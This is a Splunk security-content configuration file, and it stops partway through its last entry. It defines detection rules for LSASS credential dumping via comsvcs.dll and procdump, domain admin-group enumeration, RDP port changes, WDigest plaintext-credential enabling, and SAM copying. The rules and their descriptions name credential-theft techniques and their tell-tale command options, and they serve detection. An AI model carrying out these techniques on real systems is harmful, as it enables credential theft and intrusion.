action.escu.enabled = 1 description = The following analytic detects the behavior of dumping credentials from memory, a tactic commonly used by adversaries to exploit the Local Security Authority Subsystem Service (LSASS) in Windows, which manages system-level authentication. The detection is made by monitoring logs with process information from endpoints and identifying instances where the rundll32 process is used in conjunction with the comsvcs.dll and MiniDump. This indicates potential LSASS dumping attempts used by threat actors to obtain valuable credentials. The detection is important because credential theft can lead to broader system compromise, persistence, lateral movement, and escalated privileges. No legitimate use of this technique has been identified yet. This behavior is often part of more extensive attack campaigns and is associated with numerous threat groups that use the stolen credentials to access sensitive information or systems, leading to data theft, ransomware attacks, or other damaging outcomes. False positives can occur since legitimate uses of the LSASS process can cause benign activities to be flagged. Next steps include reviewing the processes involved in the LSASS dumping attempt after triage and inspecting any relevant on-disk artifacts and concurrent processes to identify the attack source. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the behavior of dumping credentials from memory, a tactic commonly used by adversaries to exploit the Local Security Authority Subsystem Service (LSASS) in Windows, which manages system-level authentication. The detection is made by monitoring logs with process information from endpoints and identifying instances where the rundll32 process is used in conjunction with the comsvcs.dll and MiniDump. This indicates potential LSASS dumping attempts used by threat actors to obtain valuable credentials. The detection is important because credential theft can lead to broader system compromise, persistence, lateral movement, and escalated privileges. No legitimate use of this technique has been identified yet. This behavior is often part of more extensive attack campaigns and is associated with numerous threat groups that use the stolen credentials to access sensitive information or systems, leading to data theft, ransomware attacks, or other damaging outcomes. False positives can occur since legitimate uses of the LSASS process can cause benign activities to be flagged. Next steps include reviewing the processes involved in the LSASS dumping attempt after triage and inspecting any relevant on-disk artifacts and concurrent processes to identify the attack source. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Dump LSASS via comsvcs DLL - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Industroyer2", "HAFNIUM Group", "CISA AA22-264A", "Prestige Ransomware", "Credential Dumping", "CISA AA22-257A", "Living Off The Land", "Suspicious Rundll32 Activity", "Data Destruction", "Volt Typhoon", "Flax Typhoon"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified accessing credentials using comsvcs.dll on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Dump LSASS via comsvcs DLL - Rule action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "HAFNIUM Group", "CISA AA22-264A", "Prestige Ransomware", "Credential Dumping", "CISA AA22-257A", "Living Off The Land", "Suspicious Rundll32 Activity", "Data Destruction", "Volt Typhoon", "Flax Typhoon"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the behavior of dumping credentials from memory, a tactic commonly used by adversaries to exploit the Local Security Authority Subsystem Service (LSASS) in Windows, which manages system-level authentication. The detection is made by monitoring logs with process information from endpoints and identifying instances where the rundll32 process is used in conjunction with the comsvcs.dll and MiniDump. This indicates potential LSASS dumping attempts used by threat actors to obtain valuable credentials. The detection is important because credential theft can lead to broader system compromise, persistence, lateral movement, and escalated privileges. No legitimate use of this technique has been identified yet. This behavior is often part of more extensive attack campaigns and is associated with numerous threat groups that use the stolen credentials to access sensitive information or systems, leading to data theft, ransomware attacks, or other damaging outcomes. False positives can occur since legitimate uses of the LSASS process can cause benign activities to be flagged. Next steps include reviewing the processes involved in the LSASS dumping attempt after triage and inspecting any relevant on-disk artifacts and concurrent processes to identify the attack source. action.notable.param.rule_title = Dump LSASS via comsvcs DLL action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*comsvcs.dll* Processes.process=*MiniDump* by Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_comsvcs_dll_filter` [ESCU - Dump LSASS via procdump - Rule] action.escu = 0 action.escu.enabled = 1 description = Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (original_file_name=procdump) of the PE or look for procdump64.exe. Modify the query as needed.\ During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (original_file_name=procdump) of the PE or look for procdump64.exe. Modify the query as needed.\ During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. action.escu.creation_date = 2022-08-31 action.escu.modification_date = 2022-08-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Dump LSASS via procdump - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "HAFNIUM Group", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to dump lsass.exe on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Dump LSASS via procdump - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "HAFNIUM Group", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (original_file_name=procdump) of the PE or look for procdump64.exe. Modify the query as needed.\ During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe. action.notable.param.rule_title = Dump LSASS via procdump action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_procdump` (Processes.process=*-ma* OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_filter` [ESCU - Elevated Group Discovery With Net - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for specific elevated domain groups. Red Teams and adversaries alike use net.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for specific elevated domain groups. Red Teams and adversaries alike use net.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Elevated Group Discovery With Net - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Volt Typhoon", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Elevated domain group discovery enumeration on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Elevated Group Discovery With Net - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Volt Typhoon", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for specific elevated domain groups. Red Teams and adversaries alike use net.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.notable.param.rule_title = Elevated Group Discovery With Net action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") (Processes.process="*group*" AND Processes.process="*/do*") (Processes.process="*Domain Admins*" OR Processes.process="*Enterprise Admins*" OR Processes.process="*Schema Admins*" OR Processes.process="*Account Operators*" OR Processes.process="*Server Operators*" OR Processes.process="*Protected Users*" OR Processes.process="*Dns Admins*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `elevated_group_discovery_with_net_filter` [ESCU - Elevated Group Discovery with PowerView - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroupMember` commandlet. `Get-DomainGroupMember` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroupMember` is used to list the members of an specific domain group. Red Teams and adversaries alike use PowerView to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroupMember` commandlet. `Get-DomainGroupMember` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroupMember` is used to list the members of an specific domain group. Red Teams and adversaries alike use PowerView to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerView for troubleshooting. action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Elevated Group Discovery with PowerView - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Elevated Group Discovery with PowerView - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (Message = "*Get-DomainGroupMember*") AND Message IN ("*Domain Admins*","*Enterprise Admins*", "*Schema Admins*", "*Account Operators*" , "*Server Operators*", "*Protected Users*", "*Dns Admins*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | rename ComputerName as dest, User as user | `security_content_ctime(firstTime)` | `elevated_group_discovery_with_powerview_filter` [ESCU - Elevated Group Discovery With Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for specific domain groups. Red Teams and adversaries alike use net.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for specific domain groups. Red Teams and adversaries alike use net.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Elevated Group Discovery With Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Elevated domain group discovery enumeration on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Elevated Group Discovery With Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for specific domain groups. Red Teams and adversaries alike use net.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.notable.param.rule_title = Elevated Group Discovery With Wmic action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe") (Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap*) (Processes.process="*Domain Admins*" OR Processes.process="*Enterprise Admins*" OR Processes.process="*Schema Admins*" OR Processes.process="*Account Operators*" OR Processes.process="*Server Operators*" OR Processes.process="*Protected Users*" OR Processes.process="*Dns Admins*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `elevated_group_discovery_with_wmic_filter` [ESCU - Enable RDP In Other Port Number - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a modification to registry to enable rdp to a machine with different port number. This technique was seen in some atttacker tries to do lateral movement and remote access to a compromised machine to gain control of it. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a modification to registry to enable rdp to a machine with different port number. This technique was seen in some atttacker tries to do lateral movement and remote access to a compromised machine to gain control of it. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Enable RDP In Other Port Number - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prohibited Traffic Allowed or Protocol Mismatch", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = RDP was moved to a non-standard port on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Enable RDP In Other Port Number - Rule action.correlationsearch.annotations = {"analytic_story": ["Prohibited Traffic Allowed or Protocol Mismatch", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a modification to registry to enable rdp to a machine with different port number. This technique was seen in some atttacker tries to do lateral movement and remote access to a compromised machine to gain control of it. action.notable.param.rule_title = Enable RDP In Other Port Number action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp*" Registry.registry_value_name = "PortNumber") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_rdp_in_other_port_number_filter` [ESCU - Enable WDigest UseLogonCredential Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious registry modification to enable plain text credential feature of windows. This technique was used by several malware and also by mimikatz to be able to dumpe the a plain text credential to the compromised or target host. This TTP is really a good indicator that someone wants to dump the crendential of the host so it must be a good pivot for credential dumping techniques. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious registry modification to enable plain text credential feature of windows. This technique was used by several malware and also by mimikatz to be able to dumpe the a plain text credential to the compromised or target host. This TTP is really a good indicator that someone wants to dump the crendential of the host so it must be a good pivot for credential dumping techniques. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Enable WDigest UseLogonCredential Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "Windows Registry Abuse", "CISA AA22-320A"] action.risk = 1 action.risk.param._risk_message = wdigest registry $registry_path$ was modified in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Enable WDigest UseLogonCredential Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Windows Registry Abuse", "CISA AA22-320A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious registry modification to enable plain text credential feature of windows. This technique was used by several malware and also by mimikatz to be able to dumpe the a plain text credential to the compromised or target host. This TTP is really a good indicator that someone wants to dump the crendential of the host so it must be a good pivot for credential dumping techniques. action.notable.param.rule_title = Enable WDigest UseLogonCredential Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\*" Registry.registry_value_name = "UseLogonCredential" Registry.registry_value_data=0x00000001) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_wdigest_uselogoncredential_registry_filter` [ESCU - Enumerate Users Local Group Using Telegram - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will detect a suspicious Telegram process enumerating all network users in a local group. This technique was seen in a Monero infected honeypot to mapped all the users on the compromised system. EventCode 4798 is generated when a process enumerates a user's security-enabled local groups on a computer or device. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic will detect a suspicious Telegram process enumerating all network users in a local group. This technique was seen in a Monero infected honeypot to mapped all the users on the compromised system. EventCode 4798 is generated when a process enumerates a user's security-enabled local groups on a computer or device. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the Task Schedule (Exa. Security Log EventCode 4798) endpoints. Tune and filter known instances of process like logonUI used in your environment. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Enumerate Users Local Group Using Telegram - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["XMRig"] action.risk = 1 action.risk.param._risk_message = The Telegram application has been identified enumerating local groups on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Enumerate Users Local Group Using Telegram - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will detect a suspicious Telegram process enumerating all network users in a local group. This technique was seen in a Monero infected honeypot to mapped all the users on the compromised system. EventCode 4798 is generated when a process enumerates a user's security-enabled local groups on a computer or device. action.notable.param.rule_title = Enumerate Users Local Group Using Telegram action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4798 Process_Name = "*\\telegram.exe" | stats count min(_time) as firstTime max(_time) as lastTime by user dest EventCode Process_Name Process_ID Account_Name Account_Domain Logon_ID Security_ID Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enumerate_users_local_group_using_telegram_filter` [ESCU - Esentutl SAM Copy - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the process - `esentutl.exe` - being used to capture credentials stored in ntds.dit or the SAM file on disk. During triage, review parallel processes and determine if legitimate activity. Upon determination of illegitimate activity, take further action to isolate and contain the threat. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the process - `esentutl.exe` - being used to capture credentials stored in ntds.dit or the SAM file on disk. During triage, review parallel processes and determine if legitimate activity. Upon determination of illegitimate activity, take further action to isolate and contain the threat. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. 